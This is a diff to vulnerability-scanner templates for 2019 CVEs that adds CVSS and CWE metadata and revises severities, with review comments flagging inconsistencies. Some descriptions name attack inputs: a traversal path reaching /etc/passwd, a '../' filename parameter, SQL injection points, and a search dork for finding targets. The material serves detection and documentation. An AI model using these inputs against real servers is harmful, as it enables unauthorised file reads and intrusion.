--- a/cves/2019/CVE-2019-0230.yaml +++ b/cves/2019/CVE-2019-0230.yaml @@ -7,8 +7,13 @@ info: reference: - https://cwiki.apache.org/confluence/display/WW/S2-059 - https://www.tenable.com/blog/cve-2019-0230-apache-struts-potential-remote-code-execution-vulnerability - severity: high + severity: critical tags: struts,rce,cve,cve2019 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-0230 + cwe-id: CWE-915 requests: - method: GET diff --git a/cves/2019/CVE-2019-10068.yaml b/cves/2019/CVE-2019-10068.yaml index 939dbedfd4..f3c238c10a 100644 --- a/cves/2019/CVE-2019-10068.yaml +++ b/cves/2019/CVE-2019-10068.yaml @@ -12,6 +12,11 @@ info: - https://packetstormsecurity.com/files/157588/Kentico-CMS-12.0.14-Remote-Command-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2019-10068 - https://github.com/rapid7/metasploit-framework/pull/13107 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-10068 + cwe-id: CWE-502 requests: - method: POST diff --git a/cves/2019/CVE-2019-10092.yaml b/cves/2019/CVE-2019-10092.yaml index 4df9c87c68..8a546703a7 100644 --- a/cves/2019/CVE-2019-10092.yaml +++ b/cves/2019/CVE-2019-10092.yaml @@ -9,6 +9,11 @@ info: - https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-10092-Limited%20Cross-Site%20Scripting%20in%20mod_proxy%20Error%20Page-Apache%20httpd - https://httpd.apache.org/security/vulnerabilities_24.html tags: cve,cve2019,apache,htmli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-10092 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-1010287.yaml b/cves/2019/CVE-2019-1010287.yaml index cb37d90548..93c87f6f1b 100644 --- a/cves/2019/CVE-2019-1010287.yaml +++ b/cves/2019/CVE-2019-1010287.yaml 
@@ -3,13 +3,19 @@ id: CVE-2019-1010287 info: name: Timesheet 1.5.3 - Cross Site Scripting author: pikpikcu - severity: high + severity: medium reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 - http://www.mdh-tz.info/ # demo tags: cve,cve2019,timesheet,xss additional-fields: google-dork: inurl:"/timesheet/login.php" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-1010287 + cwe-id: CWE-79 + description: "Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a \"redirect\" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url." requests: - raw: # Metod POST From login.php diff --git a/cves/2019/CVE-2019-10475.yaml b/cves/2019/CVE-2019-10475.yaml index ed170a3bfe..bd50686df4 100644 --- a/cves/2019/CVE-2019-10475.yaml +++ b/cves/2019/CVE-2019-10475.yaml @@ -5,6 +5,16 @@ info: author: madrobot severity: medium tags: cve,cve2019,jenkins,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-10475 + cwe-id: CWE-79 + description: "A reflected cross-site scripting vulnerability in Jenkins build-metrics Plugin allows attackers to inject arbitrary HTML and JavaScript into web pages provided by this plugin." + reference: + - https://jenkins.io/security/advisory/2019-10-23/#SECURITY-1490 + - http://www.openwall.com/lists/oss-security/2019/10/23/2 + - http://packetstormsecurity.com/files/155200/Jenkins-Build-Metrics-1.3-Cross-Site-Scripting.html requests: - method: GET diff --git a/cves/2019/CVE-2019-11013.yaml b/cves/2019/CVE-2019-11013.yaml index afd00e4a16..d5cbcb989d 100644 --- a/cves/2019/CVE-2019-11013.yaml +++ b/cves/2019/CVE-2019-11013.yaml 
@@ -3,11 +3,17 @@ id: CVE-2019-11013 info: name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal author: 0x_Akoko - severity: high + severity: medium reference: - https://www.exploit-db.com/exploits/47301 - https://nvd.nist.gov/vuln/detail/CVE-2019-11013 tags: cve,cve2019,lfi,nimble + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2019-11013 + cwe-id: CWE-22 + description: "Nimble Streamer 3.0.2-2 through 3.5.4-9 has a ../ directory traversal vulnerability. Successful exploitation could allow an attacker to traverse the file system to access files or directories that are outside of the restricted directory on the remote server." requests: - method: GET diff --git a/cves/2019/CVE-2019-11248.yaml b/cves/2019/CVE-2019-11248.yaml index 4f65493181..7d3e107c36 100644 --- a/cves/2019/CVE-2019-11248.yaml +++ b/cves/2019/CVE-2019-11248.yaml @@ -3,12 +3,17 @@ id: CVE-2019-11248 info: name: exposed_pprof author: 0xceeb - severity: medium + severity: high tags: cve,cve2019,debug description: The debugging endpoint /debug/pprof is exposed over the unauthenticated Kubelet healthz port. The go pprof endpoint is exposed over the Kubelet's healthz port. This debugging endpoint can potentially leak sensitive information such as internal Kubelet memory addresses and configuration, or for limited denial of service. Versions prior to 1.15.0, 1.14.4, 1.13.8, and 1.12.10 are affected. The issue is of medium severity, but not exposed by the default configuration. reference: - https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0 - http://mmcloughlin.com/posts/your-pprof-is-showing + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L + cvss-score: 8.20 + cve-id: CVE-2019-11248 + cwe-id: CWE-862 requests: - method: GET diff --git a/cves/2019/CVE-2019-11510.yaml b/cves/2019/CVE-2019-11510.yaml index 7effbabf9b..5be81356d6 100644 --- a/cves/2019/CVE-2019-11510.yaml 
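Review bot: The CVE-2019-11248 hunk bumps `severity` from medium to high (CVSS 8.2), but the retained `description:` still ends with "The issue is of medium severity, but not exposed by the default configuration.", so the file now contradicts itself. Either keep the new rating and reword that sentence to something like `Rated high by NVD (CVSS 8.2); the endpoint is not exposed by the default configuration.`, or keep the upstream Kubernetes rating and leave `severity: medium`. The name `exposed_pprof` is also not in the "Product - Issue" form used by neighbouring templates; `name: Kubernetes Kubelet - Exposed /debug/pprof Endpoint` would match them.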
+++ b/cves/2019/CVE-2019-11510.yaml @@ -3,9 +3,15 @@ id: CVE-2019-11510 info: name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability author: organiccrap - severity: high + severity: critical reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html tags: cve,cve2019,pulsesecure,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2019-11510 + cwe-id: CWE-22 + description: "In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability ." requests: - method: GET diff --git a/cves/2019/CVE-2019-11580.yaml b/cves/2019/CVE-2019-11580.yaml index a26ec36e14..095100bde7 100644 --- a/cves/2019/CVE-2019-11580.yaml +++ b/cves/2019/CVE-2019-11580.yaml @@ -21,6 +21,10 @@ info: reference: - https://github.com/jas502n/CVE-2019-11580 - https://jira.atlassian.com/browse/CWD-5388 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-11580 requests: - method: GET diff --git a/cves/2019/CVE-2019-11581.yaml b/cves/2019/CVE-2019-11581.yaml index ec056b1abc..0f8fb34038 100644 --- a/cves/2019/CVE-2019-11581.yaml +++ b/cves/2019/CVE-2019-11581.yaml @@ -7,6 +7,11 @@ info: severity: critical reference: https://github.com/jas502n/CVE-2019-11581 tags: cve,cve2019,atlassian,jira,ssti,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-11581 + cwe-id: CWE-74 requests: - method: GET diff --git a/cves/2019/CVE-2019-11869.yaml b/cves/2019/CVE-2019-11869.yaml index 2053f87579..9c68042cfd 100644 --- a/cves/2019/CVE-2019-11869.yaml +++ b/cves/2019/CVE-2019-11869.yaml 
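Review bot: The quoted description added in the CVE-2019-11510 hunk ends with `vulnerability .` — a stray space before the period — and should read `... to perform an arbitrary file reading vulnerability.` It is a small thing, but this string is rendered verbatim in reports and the other descriptions in this commit are clean NVD text. The `cwe-id: CWE-22`, the scope-changed vector and the 10.0 score are consistent with each other and with the `lfi` tag, so nothing else in the block needs changing.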
@@ -16,6 +16,11 @@ info: - https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild - https://wpscan.com/vulnerability/9254 tags: cve,cve2019,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-11869 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2019/CVE-2019-12276.yaml b/cves/2019/CVE-2019-12276.yaml index a069b1acf1..a0cc848279 100644 --- a/cves/2019/CVE-2019-12276.yaml +++ b/cves/2019/CVE-2019-12276.yaml @@ -9,6 +9,11 @@ info: - https://security401.com/grandnode-path-traversal/ - https://www.cvedetails.com/cve/CVE-2019-12276 tags: cve,cve2019,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-12276 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-12314.yaml b/cves/2019/CVE-2019-12314.yaml index a9e7754a57..6447b9ad1c 100644 --- a/cves/2019/CVE-2019-12314.yaml +++ b/cves/2019/CVE-2019-12314.yaml @@ -3,13 +3,18 @@ id: CVE-2019-12314 info: name: Deltek Maconomy 2.2.5 LFIl author: madrobot - severity: high + severity: critical tags: cve,cve2019,lfi description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI. reference: http://packetstormsecurity.com/files/153079/Deltek-Maconomy-2.2.5-Local-File-Inclusion.html https://github.com/JameelNabbo/exploits/blob/master/Maconomy%20Erp%20local%20file%20include.txt https://github.com/ras313/CVE-2019-12314/security/advisories/GHSA-8762-rf4g-23xm + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-12314 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-12461.yaml b/cves/2019/CVE-2019-12461.yaml index c2dfd74c28..ea015d4b9d 100644 --- a/cves/2019/CVE-2019-12461.yaml 
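Review bot: The classification added for CVE-2019-12314 carries a C:H/I:H/A:H vector with a 9.8 score and the hunk raises `severity` to critical, while the template's own context `description` describes a read-only local file inclusion reaching /etc/passwd; full integrity and availability impact is not something a file read demonstrates. If the vector is copied from the NVD record it can stay, but it is worth confirming rather than assuming, since the neighbouring file-read template CVE-2019-12276 is scored 7.5 with C:H/I:N/A:N on the same line. While touching this `info` block, the context `name: Deltek Maconomy 2.2.5 LFIl` has a trailing typo that the commit leaves in place.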
+++ b/cves/2019/CVE-2019-12461.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS - https://webport.se/nedladdningar/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-12461 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-12593.yaml b/cves/2019/CVE-2019-12593.yaml index 5a28c889a4..2c649f6e12 100644 --- a/cves/2019/CVE-2019-12593.yaml +++ b/cves/2019/CVE-2019-12593.yaml @@ -13,6 +13,11 @@ info: - https://www.icewarp.com/downloads/trial/ # software link additional-fields: google-dork: Powered By IceWarp 10.4.4 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-12593 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-12616.yaml b/cves/2019/CVE-2019-12616.yaml index 00eb781972..6d8e56152d 100644 --- a/cves/2019/CVE-2019-12616.yaml +++ b/cves/2019/CVE-2019-12616.yaml @@ -10,6 +10,11 @@ info: - https://www.phpmyadmin.net/security/PMASA-2019-4/ - https://www.exploit-db.com/exploits/46982 - https://nvd.nist.gov/vuln/detail/CVE-2019-12616 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2019-12616 + cwe-id: CWE-352 requests: - method: GET diff --git a/cves/2019/CVE-2019-12725.yaml b/cves/2019/CVE-2019-12725.yaml index db7a7ffd97..ec398f19ae 100644 --- a/cves/2019/CVE-2019-12725.yaml +++ b/cves/2019/CVE-2019-12725.yaml @@ -13,6 +13,11 @@ info: - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py tags: cve,cve2019,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-12725 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2019/CVE-2019-13101.yaml b/cves/2019/CVE-2019-13101.yaml index 14ca50d4c4..747ee42f66 100644 
--- a/cves/2019/CVE-2019-13101.yaml +++ b/cves/2019/CVE-2019-13101.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2019-13101 - https://github.com/d0x0/D-Link-DIR-600M - https://www.exploit-db.com/exploits/47250 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-13101 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2019/CVE-2019-13462.yaml b/cves/2019/CVE-2019-13462.yaml index 41c5e358b9..7d3c23a851 100644 --- a/cves/2019/CVE-2019-13462.yaml +++ b/cves/2019/CVE-2019-13462.yaml @@ -7,6 +7,11 @@ info: reference: https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/ description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameters to /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI. tags: cve,cve2019,sqli,lansweeper + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.10 + cve-id: CVE-2019-13462 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2019/CVE-2019-14205.yaml b/cves/2019/CVE-2019-14205.yaml index 05fcd12672..41b27f1e70 100644 --- a/cves/2019/CVE-2019-14205.yaml +++ b/cves/2019/CVE-2019-14205.yaml @@ -6,6 +6,11 @@ info: tags: cve,cve2019,wordpress,wp-plugin,lfi description: A Local File Inclusion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php. reference: https://github.com/security-kma/EXPLOITING-CVE-2019-14205 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-14205 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-14223.yaml b/cves/2019/CVE-2019-14223.yaml index 9e75997beb..8caabe4459 100644 
--- a/cves/2019/CVE-2019-14223.yaml +++ b/cves/2019/CVE-2019-14223.yaml @@ -3,12 +3,17 @@ id: CVE-2019-14223 info: name: Alfresco Share Open Redirect author: pdteam - severity: low + severity: medium description: An issue was discovered in Alfresco Community Edition versions below 5.2.6, 6.0.N and 6.1.N. The Alfresco Share application is vulnerable to an Open Redirect attack via a crafted POST request. By manipulating the POST parameters, an attacker can redirect a victim to a malicious website over any protocol the attacker desires (e.g.,http, https, ftp, smb, etc.). reference: - https://community.alfresco.com/content?filterID=all~objecttype~thread%5Bquestions%5D - https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-14223-Open%20Redirect%20in%20Alfresco%20Share-Alfresco%20Community tags: cve,cve2019,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-14223 + cwe-id: CWE-601 requests: - method: POST diff --git a/cves/2019/CVE-2019-14312.yaml b/cves/2019/CVE-2019-14312.yaml index 33a5873d2d..ba83455a64 100644 --- a/cves/2019/CVE-2019-14312.yaml +++ b/cves/2019/CVE-2019-14312.yaml @@ -3,12 +3,17 @@ id: CVE-2019-14312 info: name: Aptana Jaxer 1.0.3.4547 - Local File inclusion author: daffainfo - severity: high + severity: medium description: Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source code viewer. This vulnerability allows a remote attacker to read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI. reference: - https://www.exploit-db.com/exploits/47214 - https://www.cvedetails.com/cve/CVE-2019-14312 tags: cve,cve2019,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2019-14312 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-14322.yaml b/cves/2019/CVE-2019-14322.yaml index 2aa82033aa..4c63be4e87 100644 
--- a/cves/2019/CVE-2019-14322.yaml +++ b/cves/2019/CVE-2019-14322.yaml @@ -5,6 +5,15 @@ info: author: madrobot severity: high tags: cve,cve2019,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-14322 + cwe-id: CWE-22 + description: "In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames." + reference: + - https://palletsprojects.com/blog/werkzeug-0-15-5-released/ + - http://packetstormsecurity.com/files/163398/Pallets-Werkzeug-0.15.4-Path-Traversal.html requests: - method: GET diff --git a/cves/2019/CVE-2019-14470.yaml b/cves/2019/CVE-2019-14470.yaml index 05400bc1a4..d956d7190a 100644 --- a/cves/2019/CVE-2019-14470.yaml +++ b/cves/2019/CVE-2019-14470.yaml @@ -8,6 +8,12 @@ info: - https://wpscan.com/vulnerability/9815 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-14470 + cwe-id: CWE-79 + description: "cosenary Instagram-PHP-API (aka Instagram PHP API V2), as used in the UserPro plugin through 4.9.32 for WordPress, has XSS via the example/success.php error_description parameter." requests: - method: GET diff --git a/cves/2019/CVE-2019-14696.yaml b/cves/2019/CVE-2019-14696.yaml index 85799b6418..7188ec08ff 100644 --- a/cves/2019/CVE-2019-14696.yaml +++ b/cves/2019/CVE-2019-14696.yaml @@ -6,6 +6,12 @@ info: severity: medium reference: https://nvd.nist.gov/vuln/detail/CVE-2019-14696 tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-14696 + cwe-id: CWE-79 + description: "Open-School 3.0, and Community Edition 2.3, allows XSS via the osv/index.php?r=students/guardians/create id parameter." requests: - method: GET 
diff --git a/cves/2019/CVE-2019-14974.yaml b/cves/2019/CVE-2019-14974.yaml index 6bc08641a7..66654e66ed 100644 --- a/cves/2019/CVE-2019-14974.yaml +++ b/cves/2019/CVE-2019-14974.yaml @@ -3,8 +3,16 @@ id: CVE-2019-14974 info: name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting author: madrobot - severity: low + severity: medium tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-14974 + cwe-id: CWE-79 + description: "SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS." + reference: + - https://www.exploit-db.com/exploits/47247 requests: - method: GET diff --git a/cves/2019/CVE-2019-15043.yaml b/cves/2019/CVE-2019-15043.yaml index dddcb93e9e..94b48eecc8 100644 --- a/cves/2019/CVE-2019-15043.yaml +++ b/cves/2019/CVE-2019-15043.yaml @@ -2,13 +2,18 @@ id: CVE-2019-15043 info: author: bing0o name: Grafana unauthenticated API - severity: medium + severity: high description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana. reference: - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/ - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory - https://community.grafana.com/t/release-notes-v6-3-x/19202 tags: cve,cve2019,grafana + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2019-15043 + cwe-id: CWE-306 requests: - raw: diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml index 9d736b993d..7f6616f3c8 100644 --- a/cves/2019/CVE-2019-15107.yaml +++ b/cves/2019/CVE-2019-15107.yaml 
@@ -3,10 +3,15 @@ id: CVE-2019-15107 info: name: Webmin <= 1.920 Unauthenticated Remote Command Execution author: bp0lr - severity: high + severity: critical description: An issue was discovered in Webmin <=1.920. The 'old' parameter in password_change.cgi contains a command injection vulnerability. reference: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html tags: cve,cve2019,webmin,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-15107 + cwe-id: CWE-78 requests: - raw: # diff --git a/cves/2019/CVE-2019-15501.yaml b/cves/2019/CVE-2019-15501.yaml index 3481874161..f1cdb338d5 100644 --- a/cves/2019/CVE-2019-15501.yaml +++ b/cves/2019/CVE-2019-15501.yaml @@ -9,6 +9,12 @@ info: - http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501 tags: cve,cve2019,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15501 + cwe-id: CWE-79 + description: "Reflected cross site scripting (XSS) in L-Soft LISTSERV before 16.5-2018a exists via the /scripts/wa.exe OK parameter." requests: - method: GET diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml index e2cf961b99..052732aa1e 100644 --- a/cves/2019/CVE-2019-15713.yaml +++ b/cves/2019/CVE-2019-15713.yaml @@ -9,6 +9,11 @@ info: - https://wpscan.com/vulnerability/9267 - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15713 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-15858.yaml b/cves/2019/CVE-2019-15858.yaml index 104ee2be4e..0516be3ea1 100644 --- a/cves/2019/CVE-2019-15858.yaml +++ b/cves/2019/CVE-2019-15858.yaml 
@@ -13,6 +13,11 @@ info: reference: https://github.com/GeneralEG/CVE-2019-15858 tags: cve,cve2019,wordpress,wp-plugin,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2019-15858 + cwe-id: CWE-306 requests: - method: GET diff --git a/cves/2019/CVE-2019-15859.yaml b/cves/2019/CVE-2019-15859.yaml index cfdbc56cc2..3d33b1df7c 100644 --- a/cves/2019/CVE-2019-15859.yaml +++ b/cves/2019/CVE-2019-15859.yaml @@ -7,6 +7,11 @@ info: reference: https://seclists.org/fulldisclosure/2019/Oct/10 severity: critical tags: cve,cve2019,disclosure,socomec,diris,iot + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-15859 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2019/CVE-2019-15889.yaml b/cves/2019/CVE-2019-15889.yaml index 6ccc20b699..66a57ec7c5 100644 --- a/cves/2019/CVE-2019-15889.yaml +++ b/cves/2019/CVE-2019-15889.yaml @@ -9,6 +9,11 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889 - https://www.cybersecurity-help.cz/vdb/SB2019041819 tags: cve,cve2019,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-15889 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-16097.yaml b/cves/2019/CVE-2019-16097.yaml index bbcb4dd03f..a22723a7a2 100644 --- a/cves/2019/CVE-2019-16097.yaml +++ b/cves/2019/CVE-2019-16097.yaml 
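Review bot: In the CVE-2019-15858 hunk the new classification uses `cwe-id: CWE-306` with a C:H/I:H/A:H vector, while the context `tags:` line labels the template `xss`; the two describe different weaknesses, so anyone filtering results by CWE or by tag gets an inconsistent picture of what a hit proves. If the request only demonstrates reflected XSS, the NVD-derived vector overstates the finding and the template should say so in `description`; if it exercises the unauthenticated change, add `auth-bypass` to `tags`. The request body is outside this hunk, so which case applies has to be checked in the file.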
@@ -2,13 +2,18 @@ id: CVE-2019-16097 info: name: Harbor Enables Privilege Escalation From Zero to admin author: pikpikcu - severity: critical + severity: medium description: | core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP. reference: - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ - https://github.com/goharbor/harbor/issues/8951 tags: cve,cve2019,intrusive,harbor + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N + cvss-score: 6.50 + cve-id: CVE-2019-16097 + cwe-id: CWE-862 requests: - method: POST diff --git a/cves/2019/CVE-2019-16278.yaml b/cves/2019/CVE-2019-16278.yaml index 21efd21490..ca568b2722 100644 --- a/cves/2019/CVE-2019-16278.yaml +++ b/cves/2019/CVE-2019-16278.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://www.exploit-db.com/raw/47837 tags: cve,cve2019,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-16278 + cwe-id: CWE-22 + description: "Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request." requests: - raw: diff --git a/cves/2019/CVE-2019-16313.yaml b/cves/2019/CVE-2019-16313.yaml index e1bd078ded..8a154f7dff 100644 --- a/cves/2019/CVE-2019-16313.yaml +++ b/cves/2019/CVE-2019-16313.yaml 
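Review bot: CVE-2019-16097 is downgraded from critical to medium on the strength of a PR:L vector, but the visible `name` ("Privilege Escalation From Zero to admin") and `description` (self-registration lets a non-admin create admin accounts) say the required privilege is a self-registered account, which the attacker can create whenever self-registration is enabled. The 6.5 score is NVD's and can stay in `classification`, but mapping `severity` mechanically from it hides that a hit on this intrusive template means full admin takeover; consider keeping `severity: critical`, or at least add a sentence to `description` such as `NVD scores this 6.5 (PR:L) because a registered account is required; with self-registration enabled that account is attacker-controlled, so the practical impact is full admin takeover.`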
